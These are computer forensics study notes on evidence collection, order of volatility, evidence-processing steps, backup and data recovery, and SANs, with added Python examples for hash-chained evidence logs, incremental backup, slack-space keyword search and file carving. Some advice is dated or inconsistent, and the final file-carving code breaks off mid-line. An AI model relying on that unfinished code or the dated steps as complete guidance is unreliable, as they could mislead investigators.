Computer Forensics
Part A
1. What is the role of artifacts in computer forensics?
There is almost always something left behind by the attacker—be it
code programs, running processes, or sniffer log files. These are known
as artifacts.
Never attempt to analyze an artifact on the compromised system.
Artifacts are capable of anything, and you want to make sure their
effects are controlled.
2. Give a brief idea about volatile evidences?
Always try to collect the most volatile evidence first. An example of an
order of volatility would be:
 1. Registers and cache
 2. Routing tables
 3. ARP cache
 4. Process table
 5. Kernel statistics and modules
 6. Main memory
 7. Temporary file systems
 8. Secondary memory
 9. Router configuration
 10. Network topology
3. Describe in detail the services offered by computer forensics?
Computer forensics offers many services, including the following:
 Forensic incident response
 Evidence collection
 Forensic analysis
 Expert witness
 Forensic litigation and insurance claims support
 Training
 Forensic process improvement
i. Forensic incident response: forensics and incident response is an
important part of business and law enforcement operations.
ii. Evidence collection: This includes memory dumps, network status,
process dumps, other system information and disk images; forensic
analysis is done on the images, not on the original disk.
iii. Forensic analysis: Forensic analysis is a term for in-depth analysis,
investigation whose purpose is to objectively identify and
document the culprits, reasons, course and consequences of a
security incident or violation of state laws or rules of the
organization.
iv. Expert witness: An expert witness, particularly in common law
countries such as the United Kingdom, Australia, and the United
States, is a person whose opinion by virtue of education, training,
certification, skills or experience, is accepted by the judge as an
expert.
v. Forensic process improvement: The purpose of this part of the
chapter is to introduce the reader to a process that will enable a
system administrator or information security analyst to determine
the threat against their systems and networks.
4. What are the rules for evidence collection?
There are five rules of collecting electronic evidence. These relate to
five properties that evidence must have to be useful.
 Admissible
 Authentic
 Complete
 Reliable
 Believable
a. Admissible: Admissible is the most basic rule. The evidence must
be able to be used in court or otherwise. Failure to comply with
this rule is equivalent to not collecting the evidence in the first
place, except the cost is higher.
b. Authentic: If you can’t tie the evidence positively to the
incident, you can’t use it to prove anything.
c. Complete: It’s not enough to collect evidence that just shows
one perspective of the incident.
d. Reliable: The evidence you collect must be reliable. Your
evidence collection and analysis procedures must not cast
doubt on the evidence’s authenticity and veracity.
e. Believable: The evidence you present should be clearly
understandable and believable to a jury.
5. What is internet Security hierarchy?
Information such as trade secrets, vault and authorization codes, and
lock and key information are clearly of a mission critical nature, and their
unintended disclosure could cause severe loss to a business or operation.
Fig: Internet security hierarchy
6. What are the different types of evidences?
a. Testimonial Evidence: Testimonial evidence is any evidence
supplied by a witness. This type of evidence is subject to the
perceived reliability of the witness, but as long as the witness
can be considered reliable, testimonial evidence can be almost
as powerful as real evidence.
(Figure labels from the internet security hierarchy diagram of question 5, as they appear: mission critical, departmental private, company private, public information.)
b. Hearsay: Hearsay is any evidence presented by a person who
was not a direct witness. Word processor documents written
by someone without direct knowledge of the incident are
hearsay. Hearsay is generally inadmissible in court and should
be avoided.
c. Real Evidence: Real Evidence is any evidence that speaks for
itself without relying on anything else. In electronic terms, this
can be a log produced by an audit function—provided that the
log can be shown to be free from contamination.
7. Discuss the role of artifacts in computer forensics?
There is almost always something left behind by the attacker—be it code
programs, running processes, or sniffer log files. These are known as
artifacts.
Never attempt to analyze an artifact on the compromised system.
Artifacts are capable of anything, and you want to make sure their
effects are controlled.
8. Compare spyware and Adware?
Spyware: Spyware is computer software which is installed surreptitiously
on a personal computer; it takes partial control over the user’s
computer, without the user’s informed consent.
Adware: Adware is any software package which automatically plays,
displays, or downloads advertisements to a computer after the software
is installed on it or while the application is being used.
Both are independent programs that can be automatically installed when
you surf the internet or when you install free software.
Most adware is spyware in a different sense than “advertising
supported software,” and for a different reason: it displays advertisements
related to what it finds by spying on you.
9. What are the different steps in evidence collection?
 Find the evidence.
 Find the relevant data.
 Create an order of volatility.
 Remove external avenues of change.
 Collect the evidence.
 Document everything.
a. Find the Evidence: Determine where the evidence you are looking
for is stored. Use a checklist. Not only does it help you to collect
evidence, but it also can be used to double-check that everything
you are looking for is there.
b. Find the Relevant Data: Once you’ve found the evidence, you must
figure out what part of it is relevant to the case. In general, you
should err on the side of over-collection, but you must remember
that you have to work fast. Don’t spend hours collecting
information that is obviously useless.
c. Create an Order of Volatility: Now that you know exactly what to gather,
work out the best order in which to gather it. The order of volatility
for your system is a good guide and ensures that you minimize loss
of uncorrupted evidence.
d. Remove External Avenues of Change: It is essential that you avoid
alterations to the original data, and prevention is always better
than a cure. Preventing anyone from tampering with the evidence
helps you create as exact an image as possible.
e. Collect the Evidence: You can now start to collect the evidence
using the appropriate tools for the job. Reevaluate the evidence
you’ve already collected. You may find that you missed something
important. Now is the time to make sure you get it.
f. Document Everything: Your collection procedures may be
questioned later, so it is important that you document everything
you do. Timestamps, digital signatures, and signed statements are
all important. Don’t leave anything out.
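As an added illustration of questions 2 and 9 (it is not part of these notes), the following Python script collects evidence sources in the notes' order of volatility and documents each item with a UTC timestamp and SHA-256 hash in a hash-chained log, so that a later edit or removal of a log entry is detectable. The collectors and the data they return are constructed for the example; on a real system each would run the appropriate acquisition tool and the log would be written to separate, signed storage.

```python
# Added example (not from the original notes): collect volatile evidence in
# order of volatility and document every item in a hash-chained log.
import hashlib
import json
from datetime import datetime, timezone

# Order of volatility from the notes (most volatile first). The position in
# this list is the collection priority: lower index is collected first.
ORDER_OF_VOLATILITY = [
    "registers and cache",
    "routing tables",
    "arp cache",
    "process table",
    "kernel statistics and modules",
    "main memory",
    "temporary file systems",
    "secondary memory",
    "router configuration",
    "network topology",
]

def volatility_rank(source):
    """Return the collection priority of an evidence source (0 = most volatile)."""
    return ORDER_OF_VOLATILITY.index(source)

# Constructed sample collectors. On a real system each would run the proper
# tool (dump the process table, read the ARP cache, image the disk); here
# they return fixed bytes so the example runs offline.
SAMPLE_COLLECTORS = {
    "process table": lambda: b"PID 1 init\nPID 812 sshd\n",
    "arp cache": lambda: b"192.0.2.1 00:00:5e:00:53:01\n",
    "secondary memory": lambda: b"<disk image placeholder>",
    "routing tables": lambda: b"default via 192.0.2.1\n",
}

def _entry_hash(entry):
    """Hash an entry's fields in canonical JSON form, excluding entry_hash itself."""
    fields = {k: v for k, v in entry.items() if k != "entry_hash"}
    return hashlib.sha256(json.dumps(fields, sort_keys=True).encode()).hexdigest()

def collect_in_order(collectors):
    """Run collectors most-volatile-first and build a hash-chained log.

    Each entry records the source, a UTC timestamp, the SHA-256 of the data
    collected and the hash of the previous entry, so editing or dropping an
    entry later breaks the chain.
    """
    log = []
    prev = "0" * 64  # genesis link for the first entry
    for source in sorted(collectors, key=volatility_rank):
        data = collectors[source]()
        entry = {
            "source": source,
            "collected_at": datetime.now(timezone.utc).isoformat(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "prev": prev,
        }
        entry["entry_hash"] = _entry_hash(entry)
        log.append(entry)
        prev = entry["entry_hash"]
    return log

def verify_log(log):
    """Return True if every link in the chain is intact and no entry was altered."""
    prev = "0" * 64
    for entry in log:
        if entry["prev"] != prev or _entry_hash(entry) != entry["entry_hash"]:
            return False
        prev = entry["entry_hash"]
    return True

if __name__ == "__main__":
    log = collect_in_order(SAMPLE_COLLECTORS)
    for e in log:
        print(e["source"], e["sha256"][:16], e["collected_at"])
    print("chain intact:", verify_log(log))
```

The chain only proves that the log was not altered after the fact; it does not prove the collected data itself is genuine, which is why the notes also require the original media to be imaged and analysed on a copy.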
Part B
1. Explain the types of computer Forensics Systems?
 Data duplication and preservation
 Data recovery
 Document searches
 Media conversion
 Expert witness services
 Computer evidence service options
 Other miscellaneous services
a. Data Seizure
Computer forensics experts, following federal guidelines, should act as this
representative, using their knowledge of data storage technologies to
track down evidence. Experts should also be able to assist during the
equipment seizure process.
b. Data Duplication and Preservation
When one party must seize data from another, two concerns must be
addressed:
 the data must not be altered in any way
 the seizure must not put an undue burden on the responding party.
Computer forensics experts should acknowledge both of these concerns
by making an exact duplicate of the needed data. When experts work on
the duplicated data, the integrity of the original data is maintained.
c. Data Recovery
Data recovery is the process in which highly trained engineers
evaluate and extract data from damaged media and return it in an
intact format.
Using proprietary tools, computer forensics experts should be able to
safely recover and analyze otherwise inaccessible evidence.
The ability to recover lost evidence is made possible by the expert’s
advanced understanding of storage technologies.
d. Document Searches
Computer forensics experts should also be able to search over 200,000
electronic documents in seconds rather than hours. The speed and
efficiency of these searches make the discovery process less complicated
and less intrusive to all parties involved.
e. Media Conversion
Computer forensics experts should extract the relevant data from these
devices, convert it into readable formats, and place it onto new storage
media for analysis.
f. Expert Witness Services
Computer forensics experts should be able to explain complex technical
processes in an easy-to-understand fashion. This should help judges and
juries comprehend how computer evidence is found, what it consists of,
and how it is relevant to a specific situation.
g. Computer Evidence Service Options
Computer forensics experts should offer various levels of service, each
designed to suit your individual investigative needs.
 Standard service
 On-Site service
 Emergency service
 Priority service
 Weekend service
i. Standard Services
Computer forensics experts should be able to work on your case during
normal business hours until the critical electronic evidence is found.
ii. On-Site Service
Computer forensics experts should be able to travel to their location to
perform complete computer evidence services. While on-site, the experts
should quickly be able to produce exact duplicates of the data storage
media in question.
iii. Emergency Service
Your computer forensics experts should be able to give your case the
highest priority in their laboratories. They should be able to work on it
without interruption until your evidence objectives are met.
iv. Priority Service
Dedicated computer forensics experts should be able to work during
normal business hours (8:00 A.M. to 5:00 P.M., Monday through Friday)
until the evidence is found. Priority service typically cuts your turnaround
time in half.
v. Weekend Service
Computer forensics experts should be able to work from 8:00 A.M. to 5:00
P.M., Saturday and Sunday, to locate the needed electronic evidence and
will continue working on your case until your evidence objectives are met.
Weekend service depends on the availability of computer forensics
experts.
h. Other Miscellaneous Services
Computer forensics experts should also be able to provide extended
services. These services include:
 Analysis of computers and data in criminal investigations
 On-site seizure of computer data in criminal investigations
 Analysis of computers and data in civil litigation.
 On-site seizure of computer data in civil litigation
 Analysis of company computers to determine employee activity
 Assistance in preparing electronic discovery requests
 Reporting in a comprehensive and readily understandable manner
 Court-recognized computer expert witness testimony
 Computer forensics on both PC and Mac platforms
 Fast turnaround time.
2. Explain data recovery process?
Data recovery is the process in which highly trained engineers evaluate
and extract data from damaged media and return it in an intact format.
Many people, even computer experts, fail to recognize data recovery as
an option during a data crisis, yet it is possible to retrieve files that have
been deleted and passwords that have been forgotten or to recover
entire hard drives that have been physically damaged.
Data Back-up and Recovery
 Back-up Obstacles
The following are obstacles to backing up applications:
 Backup window
 Network bandwidth
 System throughput
 Lack of resources
i. Back-up Windows: The backup window is the period of time
when backups can be run. The backup window is generally
timed to occur during nonproduction periods when network
bandwidth and CPU utilization are low.
ii. Network Bandwidth: If a network cannot handle the impact of
transporting hundreds of gigabytes of data over a short
period of time, the organization’s centralized backup strategy
is not viable.
iii. System throughput: Three I/O bottlenecks are commonly
found in traditional backup schemes. These are:
1. The ability of the system being backed up to push data to
the backup server.
2. The ability of the backup server to accept data from
multiple systems simultaneously.
3. The available throughput of the tape device(s) onto which
the data is moved.
iv. Lack of Resources: Many companies fail to make appropriate
investments in data protection until it is too late.
b. The Future of Data Back-up
Successful data backup and recovery is composed of four key
elements: the backup server, the network, the backup window, and
the backup storage device.
a. The Back-up Server: The backup server is responsible for
managing the policies, schedules, media catalogs, and indexes
associated with the systems it is configured to back up.
The systems being backed up are called clients.
The overall performance of a backup or recovery was directly
related to the ability of the backup server to handle the I/O
load created by the backup process.
The tape servers that allow administrators to divide the
backup tasks across multiple systems while maintaining
scheduling and administrative processes on a primary or
backup server. This approach often involves attaching
multiple tape servers to a shared tape library, which reduces
the overall cost of the system.
The newest backup architecture implements a serverless backup
solution that allows data to be moved directly from disk to tape,
bypassing the backup server altogether. This method of data backup
removes the bottleneck of the backup server completely.
However, the performance of serverless backup is then affected by
another potential bottleneck—bandwidth.
b. The Network Data Path: Centralization of a data-management
process such as backup and recovery requires a robust and
available network data path. The movement and
management of hundreds or thousands of megabytes of data
can put a strain on even the best-designed networks.
An enterprise class backup solution can distribute backup
services directly to the data source, while at the same time
centralizing the administration of these resources.
c. The Back-up Window: A backup window defines how much
time is available to back up the network. Time plays an
important role in choosing how much server, network, and
resource support needs to be deployed.
 Incremental Back-up: Incremental backups only transfer data that has
changed since the last backup.
On average, no more than 5% of data in a file server changes daily. That
means an incremental backup may only require 5% of the time it takes
to back up the entire file system.
 Block-Level Incremental Back-up: Rather than backing up entire files
that have been modified since the last backup, only the blocks that
have changed since the last backup are marked for backup.
 Image Back-up: This type of backup creates copies, or snapshots, of a
file system at a particular point in time.
Image backups are much faster than incremental backups and provide
the ability to easily perform a bare bones recovery of a server without
loading the operating systems, applications, and the like.
 Data Archiving: Removing infrequently accessed data from a disk drive
can reduce the size of a scheduled backup by up to 80%.
 Back-up Storage Device: the single most expensive item in a backup
project is the backup storage device itself.
Determining the tape format, number of tape drives, and how many
slots are required is predicated on many variables.
Backup windows, growth rates, retention policies, duplicate tape
copies, and network and server throughputs all affect which backup
storage device is best for your needs.
 Recommended Back-up Features:
1. Data Interleaving: To back up multiple systems concurrently, the
backup application must be able to write data from multiple clients
to tape in an interleaved manner.
2. Remote Back-up: Many remote systems are exposed to
unrecoverable data loss.
3. Global Monitoring: A robust backup application should be able to
support reporting and administration of any backup system,
regardless of location.
4. Performance: An enterprise backup application should be able to
benchmark backup data rates exceeding one terabyte per hour.
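As an added example, not from the notes or from any backup product, here is a small Python model of the block-level incremental backup described above: the file is cut into fixed-size blocks, each block is identified by its SHA-256 hash, and an incremental run stores only the blocks whose hash differs from the previous manifest. The block size and the in-memory block store are assumptions for the example; restore() verifies every block against its hash, which is the integrity check a practitioner wants before trusting a restored image.

```python
# Added example (not from the original notes): a model of block-level
# incremental backup with content-hashed blocks.
import hashlib

BLOCK_SIZE = 4096  # assumed block size; a real product uses the file system's

def split_blocks(data, block_size=BLOCK_SIZE):
    """Cut data into fixed-size blocks; the last block may be shorter."""
    return [data[i:i + block_size] for i in range(0, len(data), block_size)]

def block_id(block):
    """Identify a block by its SHA-256 so unchanged blocks can be recognised."""
    return hashlib.sha256(block).hexdigest()

def full_backup(data, store):
    """Store every block; return the manifest (ordered list of block ids)."""
    manifest = []
    for block in split_blocks(data):
        h = block_id(block)
        store[h] = block
        manifest.append(h)
    return manifest

def incremental_backup(data, store, previous_manifest):
    """Store only blocks that changed since previous_manifest.

    Returns (new_manifest, changed_block_indexes). A block counts as changed
    when its index lies beyond the previous manifest or its hash differs from
    the hash recorded there; only changed blocks are transferred to the store.
    """
    manifest, changed = [], []
    for i, block in enumerate(split_blocks(data)):
        h = block_id(block)
        if i >= len(previous_manifest) or previous_manifest[i] != h:
            changed.append(i)
            store.setdefault(h, block)  # skip transfer if identical content exists
        manifest.append(h)
    return manifest, changed

def restore(manifest, store):
    """Reassemble the file from a manifest, verifying each block before use."""
    out = bytearray()
    for h in manifest:
        block = store[h]
        if block_id(block) != h:
            raise ValueError("block store corrupted at " + h)
        out += block
    return bytes(out)

def transfer_ratio(changed, total_blocks):
    """Fraction of blocks an incremental run had to move (the notes' 5% figure)."""
    return len(changed) / total_blocks if total_blocks else 0.0

if __name__ == "__main__":
    store = {}
    day1 = b"".join(bytes([i]) * BLOCK_SIZE for i in range(10))
    m1 = full_backup(day1, store)
    blocks = split_blocks(day1)
    blocks[3] = b"\xff" * BLOCK_SIZE       # one block edited overnight
    day2 = b"".join(blocks) + b"tail"      # and a few bytes appended
    m2, changed = incremental_backup(day2, store, m1)
    print("changed blocks:", changed, "ratio:", transfer_ratio(changed, len(m2)))
    print("restore ok:", restore(m2, store) == day2)
```

Because every manifest still points at the blocks in the store, both the day-1 and the day-2 versions can be restored from the same store; that is the property that makes block-level incrementals cheap to keep for long retention periods.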
3. What are the different computer Forensic system technologies?
a. Types of military computer forensics technology
 Key objectives of cyber forensics include rapid discovery of
evidence, estimation of potential impact of the malicious
activity on the victim, and assessment of the intent and
identity of the perpetrator.
 Real-time tracking of potentially malicious activity is especially
difficult when the pertinent information has been intentionally hidden,
destroyed, or modified in order to elude discovery.
 National Law Enforcement and Corrections Technology
Center (NLECTC) work with criminal justice professionals to
identify urgent and emerging technology needs.
 NLECTC centers demonstrate technologies, test
commercially available technologies and publish results
linking research and practice.
Computer forensic experiment-2000 (cfx-2000)
 CFX-2000 is an integrated forensic analysis framework.
 The central hypothesis of CFX-2000 is that it is possible to accurately
determine the motives, intent, targets, sophistication, identity, and
location of cyber criminals and cyber terrorists by deploying an
integrated forensic analysis framework.
 The cyber forensic tools involved in CFX-2000 consisted of commercial
off-the-shelf software and directorate-sponsored R&D prototypes. CFX
includes the SI-FI integration environment.
 The Synthesizing Information from Forensics Investigations (SI-FI)
integration environment supports the collection, examination, and
analysis processes employed during a cyber-forensic investigation.
 The SI-FI prototype uses digital evidence bags (DEBs), which are secure
and tamperproof containers used to store digital evidence.
Investigators can seal evidence in the DEBs and use the SI-FI
implementation to collaborate on complex investigations.
b. Types of law enforcement computer forensics technology
 Computer forensics tools and techniques have become important
resources for use in internal investigations, civil lawsuits, and computer
security risk management. Law enforcement and military agencies have
been involved in processing computer evidence for years.
Computer Evidence Processing Procedures
Processing procedures and methodologies should conform to federal
computer evidence processing standards.
 Preservation of Evidence: Computer evidence is fragile and susceptible
to alteration or erasure by any number of occurrences.
i. Trojan horse Programs: The computer expert should be
able to demonstrate his or her ability to avoid destructive
programs and traps that can be planted by computer users
bent on destroying data and evidence.
Such programs can also be used to covertly capture sensitive
information, passwords, and network logons.
ii. Computer Forensics Documentation: without proper
documentation, it is difficult to present findings.
If the security or audit findings become the object of a
lawsuit or a criminal investigation, then documentation
becomes even more important.
iii. File Slack: Techniques and automated tools that are used to
capture and evaluate file slack should be demonstrated in a
training course.
iv. Data Hiding Techniques: The participants should be able to
demonstrate their ability to deal with slack and should
demonstrate proficiency in searching file slack, documenting
their findings, and eliminating the security risk.
v. E-commerce Investigations:
a. Net Three Analyzer: can be used to identify past Internet
browsing and email activity done through specific
computers.
b. Dual Purpose Programs: Programs can be designed to
perform multiple processes and tasks at the same time.
c. Text Search Techniques: Tools that can be used to find
targeted strings of text in files, file slack, unallocated file
space, and Windows swap files.
 Data Structure: Participants should be able to leave a training course
with a good understanding of how computer hard disks and floppy
diskettes are structured and how computer evidence can reside at
various levels within the structure of the disk.
 Data Encryption: A computer forensics course should cover, in general,
how data is encrypted; it should also illustrate the differences between
good encryption and bad encryption.
 Matching a Diskette to a computer: specialized techniques and tools
that make it possible to conclusively tie a diskette to a computer that
was used to create or edit files stored on it.
 Data Compression: The participant should be shown how compression
works and how compression programs can be used to hide and disguise
sensitive data.
 Erased files: The training participant should be shown how previously
erased files can be recovered by using DOS programs and by manually
using data-recovery techniques.
 Internet Abuse Identification and Detection: This process will focus on
computer forensics issues tied to data that the computer user probably
doesn’t realize exists (file slack, unallocated file space, and Windows
swap files).
 The Boot Process and Memory Resident Programs: The participant
should be able to take part in a graphic demonstration of how the
operating system can be modified to change data and destroy data at
the whim of the person who configured the system.
c. Types of Business Computer Forensics Technology
Remote Monitoring of Target Computer: Data Interception by Remote
Transmission (DIRT) from Codex Data Systems (CDS), Inc. [7] is a powerful
remote control monitoring tool that allows stealth monitoring of all activity
on one or more target computers simultaneously from a remote command
center.
 Creating trackable electronic documents:
 Theft recovery software for laptops and PCs:
What Is the Real Cost of a Stolen Laptop or PC?
i. The price of the replacement hardware.
ii. The price of replacing the software.
iii. The cost of lost production time or instruction time.
iv. The loss of customer goodwill (lost faxes, delayed
correspondence or billings, problems answering
questions and accessing data).
v. The cost of reporting and investigating the theft, filing
police reports and insurance claims.
vi. The cost of increased insurance.
Basic Forensics Tools and Techniques
 Many computer forensics workshops have been created to familiarize
investigators and security personnel with the basic techniques and
tools necessary for a successful investigation of Internet and computer-
related crimes.
 Workshop topics normally include: types of computer crime, cyber law
basics, tracing email to its source, digital evidence acquisition, cracking
passwords, monitoring computers remotely, tracking online activity,
finding and recovering hidden and deleted data, locating stolen
computers, creating trackable files, identifying software pirates, and so
on.
Forensics Services Available
 Lost password and file recovery
 Location and retrieval of deleted and hidden files
 File and email decryption
 Email supervision and authentication
 Threatening email traced to source
 Identification of Internet activity
 Computer usage policy and supervision
 Remote PC and network monitoring
 Tracking and location of stolen electronic files
 Honey pot sting operations
 Location and identity of unauthorized software users
 Theft recovery software for laptops and PCs
 Investigative and security software creation
 Protection from hackers and viruses (see sidebar, “Virus/Trojan/Worm
Protection”).
4. Describe in detail evidence processing steps?
There really are no strict rules that must be followed regarding the
processing of computer evidence. The following are general computer
forensics steps:
 Shut down the computer.
 Document the hardware configuration of the system.
 Transport the computer system to a secure location.
 Make bit stream backups of hard disks and floppy disks.
 Mathematically authenticate data on all storage devices.
 Document the system date and time.
 Make a list of key search words.
 Evaluate the Windows swap file.
 Evaluate file slack.
 Evaluate unallocated space (erased files).
 Search files, file slack, and unallocated space for keywords.
 Document file names, dates, and times.
 Identify file, program, and storage anomalies.
 Evaluate program functionality.
 Document your findings.
 Retain copies of software used.
a. Shut down the computer: Depending on the computer operating
system, this usually involves pulling the plug or shutting down a
network computer using relevant commands required by the network
involved. Generally, time is of the essence, and the computer system
should be shut down as quickly as possible.
b. Document the Hardware Configuration of the System: Before
dismantling the computer, it is important that pictures are taken of the
computer from all angles to document the system hardware
components and how they are connected. Labeling each wire is also
important, so that it can easily be reconnected when the system
configuration is restored to its original condition at a secure location.
c. Transport the Computer System to a Secure Location: a seized
computer left unattended can easily be compromised. Don’t leave the
computer unattended unless it is locked up in a secure location.
d. Make bit stream backups of hard disks and floppy disks: All evidence
processing should be done on a restored copy of the bit stream backup
rather than on the original computer. Bit stream backups are much like
an insurance policy and are essential for any serious computer evidence
processing.
e. Mathematically authenticate data on all storage devices: You want to
be able to prove that you did not alter any of the evidence after the
computer came into your possession. Since 1989, law enforcement and
military agencies have used a 32-bit mathematical process to do the
authentication process.
f. Document the system date and time: If the system clock is one hour
slow because of daylight-savings time, then file timestamps will also
reflect the wrong time. To adjust for these inaccuracies, documenting
the system date and time settings at the time the computer is taken
into evidence is essential.
g. Make a list of key search words: It is all but impossible for a computer
specialist to manually view and evaluate every file on a computer hard
disk drive. Gathering information from individuals familiar with the case
to help compile a list of relevant keywords is important. Such keywords
can be used in the search of all computer hard disk drives and floppy
diskettes using automated software.
h. Evaluate the Windows swap file: The Windows swap file is a potentially
valuable source of evidence and leads. When the computer is turned
off, the swap file is erased. But the content of the swap file can easily
be captured and evaluated.
i. Evaluate file slack: It is a source of significant security leakage and
consists of raw memory dumps that occur during the work session as
files are closed. File slack should be evaluated for relevant keywords to
supplement the keywords identified in the previous steps. File slack is
typically a good source of Internet leads.
j. Evaluate unallocated space (erased files): Unallocated space should be
evaluated for relevant keywords to supplement the keywords identified
in the previous steps.
k. Search files, file slack, and unallocated space for keywords: The list of
relevant keywords identified in the previous steps should be used to
search all relevant computer hard disk drives and floppy diskettes. It is
important to review the output of the text search utility and equally
important to document relevant findings.
l. Document file names, dates, and times: From an evidence standpoint,
file names, creation dates, and last modified dates and times can be
relevant. The output should be in the form of a word processing-
compatible file that can be used to help document computer evidence
issues tied to specific files.
m. Identify file, program, and storage anomalies: Encrypted, compressed,
and graphic files store data in binary format. As a result, text data
stored in these file formats cannot be identified by a text search
program. Manual evaluation of these files is required and, in the case of
encrypted files, much work may be involved.
n. Evaluate program functionality: Depending on the application software
involved, running programs to learn their purpose may be necessary.
When destructive processes that are tied to relevant evidence are
discovered, this can be used to prove willfulness.
o. Document your findings: it is important to document your findings as
issues are identified and as evidence is found. Documenting all of the
software used in your forensic evaluation of the evidence, including the
version numbers of the programs used, is also important.
p. Retain copies of software used: as part of your documentation process,
it is recommended that a copy of the software used be included with
the output of the forensic tool involved. Duplication of results can be
difficult or impossible to achieve if the software has been upgraded and
the original version used was not retained.
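The following Python example is added here to make steps e, i, j and k concrete; it is not code from the notes. It constructs a small 8-cluster disk image with a hand-made allocation table (cluster size, file layout and contents are all constructed for the example), derives the file slack and the unallocated clusters from that table, searches file content, slack and unallocated space for keywords, and reports where each hit sits in the image. authenticate() records both a CRC-32 (the kind of 32-bit check the notes mention) and a SHA-256 of the image; CRC-32 detects accidental change but is trivially collided, so a modern process should rely on the cryptographic hash when proving the image was not altered.

```python
# Added example (not from the original notes): keyword search of file
# content, file slack and unallocated space on a constructed disk image,
# plus hash-based authentication of the image.
import hashlib
import zlib

CLUSTER = 512        # assumed cluster size of the constructed image
N_CLUSTERS = 8       # the constructed image holds 8 clusters (4096 bytes)

# Constructed allocation table: name -> (first cluster, cluster count, logical size).
# report.txt occupies clusters 0-2 but is only 1100 bytes long, so image bytes
# 1100-1535 are its file slack. Clusters 3, 5, 6 and 7 are unallocated.
FILES = {
    "report.txt": (0, 3, 1100),
    "notes.txt": (4, 1, 200),
}

def build_sample_image():
    """Return a constructed image: live file data, slack residue and an erased file."""
    img = bytearray(CLUSTER * N_CLUSTERS)
    img[0:1100] = b"Quarterly report. Nothing to see here.".ljust(1100, b".")
    # residue left in report.txt's slack by an earlier occupant of cluster 2
    residue = b"CONFIDENTIAL draft left in slack"
    img[1100:1100 + len(residue)] = residue
    img[4 * CLUSTER:4 * CLUSTER + 14] = b"meeting notes\n"
    # an erased file whose data still sits in unallocated cluster 6
    erased = b"erased memo: CONFIDENTIAL merger terms"
    img[6 * CLUSTER:6 * CLUSTER + len(erased)] = erased
    return bytes(img)

def cluster_bounds(first, count):
    """Byte range [start, end) covered by a run of clusters."""
    return first * CLUSTER, (first + count) * CLUSTER

def file_slack(first, count, logical_size):
    """Byte range of a file's slack: from its logical end to the end of its last cluster."""
    start, end = cluster_bounds(first, count)
    return start + logical_size, end

def unallocated_clusters(files, n_clusters):
    """Clusters not claimed by any entry in the allocation table."""
    used = set()
    for first, count, _ in files.values():
        used.update(range(first, first + count))
    return [c for c in range(n_clusters) if c not in used]

def search_keywords(image, files, keywords):
    """Search content, slack and unallocated space; return (keyword, region, offset) hits."""
    regions = []
    for name, (first, count, size) in files.items():
        start, _ = cluster_bounds(first, count)
        regions.append((name + " (content)", start, start + size))
        regions.append((name + " (slack)",) + file_slack(first, count, size))
    for c in unallocated_clusters(files, len(image) // CLUSTER):
        regions.append(("unallocated cluster %d" % c,) + cluster_bounds(c, 1))
    hits = []
    for label, start, end in regions:
        chunk = image[start:end]
        for kw in keywords:
            pos = chunk.find(kw.encode())
            while pos != -1:
                hits.append((kw, label, start + pos))  # absolute image offset
                pos = chunk.find(kw.encode(), pos + 1)
    return hits

def authenticate(image):
    """Record a CRC-32 and a SHA-256 of the image; keep both with the case notes."""
    return {"crc32": "%08x" % zlib.crc32(image),
            "sha256": hashlib.sha256(image).hexdigest()}

if __name__ == "__main__":
    img = build_sample_image()
    before = authenticate(img)
    for kw, where, offset in search_keywords(img, FILES, ["CONFIDENTIAL", "meeting"]):
        print("%-12s at offset %4d in %s" % (kw, offset, where))
    print("image unchanged by the search:", authenticate(img) == before)
```

Keep the search read-only, as here, and compute the hashes before and after any examination: a match is the documentary proof that step e asks for, and a hit located in slack or unallocated space is evidence the user most likely did not know existed, which is why the notes single out those areas.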
5. What role do SANs (Storage Area Networks) play in computer forensics?
SANs are a relatively new methodology for attaching storage, whereby
a separate network (separate from the traditional LAN) connects all
storage and servers. This network would be a high-performance
implementation, such as a fiber channel, that encapsulates protocols
such as a small computer system interface (SCSI). These are more
efficient at transferring data blocks from storage and have hardware
implementations offering buffering and delivery guarantees. This is not
available using TCP/IP.
SANs promise the ability to make any-to-any connections among multiple
servers and storage devices. They can create a shared “pool” of storage
that can be accessed by multiple servers through multiple paths,
resulting in higher availability— especially during a network disaster
recovery (NDR).
SANs also promise to simplify backup procedures. Tape subsystems
could still be shared among numerous servers during backups—all
transparent to the user. In other words, SANs allow distributed servers
to access a large centralized storage subsystem for data-sharing
applications during an NDR.
 SAN Benefits:
A SAN provides a perfect environment for clustering that can
extend to dozens of servers and storage devices—all the
while having redundant links in a fibre channel fabric. Servers
will continue to function because their data is still available
through the SAN, even if storage devices fail during an NDR.
 Centralized Management: When a disk or controller fails in a
direct-attached environment, redundant systems keep the
redundant array of independent (or inexpensive) disks (RAID)
array operating normally and generate an alarm.
However, the redundant component may fail as well, bringing
the system down if the failed component isn’t replaced
quickly.
 Scalability: A storage area network can lower acquisition and
expansion costs, in addition to lowering management costs.
Even as new servers, disk arrays, and tape subsystems are
added, the SAN architecture supports access between all
servers and all storage resources in the network. Without
disrupting data access, customers can add storage resources
and even servers online.
 Reliability: A SAN is a network that resides between the host
bus adapter and the storage device.
This position inherently creates a critical point at the physical
level, but by implementing multiple paths and redundant
infrastructure devices, the SAN reduces or eliminates single
points of failure.
 Performance: In application environments that depend on bulk
data transfer (such as data warehousing and data-mining
applications), maximum bandwidth is of particular interest.
Backup and restore times can be shortened dramatically by the
high channel speed and low latency obtained by using a SAN.
6. What is data recovery? Explain the role of backup in data recovery?
Data recovery is the process in which highly trained engineers evaluate
and extract data from damaged media and return it in an intact format.
Many people, even computer experts, fail to recognize data recovery as
an option during a data crisis, yet it is possible to retrieve files that have
been deleted and passwords that have been forgotten or to recover
entire hard drives that have been physically damaged.
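As an added example of the point that deleted files can be retrieved (this is not code from these notes), the following Python carver scans a raw image of unallocated space for file signatures and pulls out complete PNG and JPEG files without consulting the file system at all. The image, the PNG and the JPEG are constructed inline so it runs offline, and only those two formats are handled; a real carver knows many more signatures and validates each candidate's structure.

```python
# Signature-based file carving over a raw image of unallocated space.
# Added example (not from these notes): the carver handles only PNG and JPEG, and
# the "disk image" is constructed inline so that it runs offline.
import struct
import zlib
from typing import List, Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PNG_END = b"IEND"          # last chunk type; followed by a 4-byte CRC
JPEG_MAGIC = b"\xff\xd8\xff"
JPEG_END = b"\xff\xd9"     # EOI marker


def carve(image: bytes) -> List[Tuple[str, int, bytes]]:
    """Scan `image` for known headers and return (type, offset, data) for every
    complete file found. The file system is ignored entirely, which is the point:
    a deleted file whose blocks have not been overwritten is still recoverable."""
    found = []
    pos = 0
    while pos < len(image):
        hits = [(o, t) for o, t in ((image.find(PNG_MAGIC, pos), "png"),
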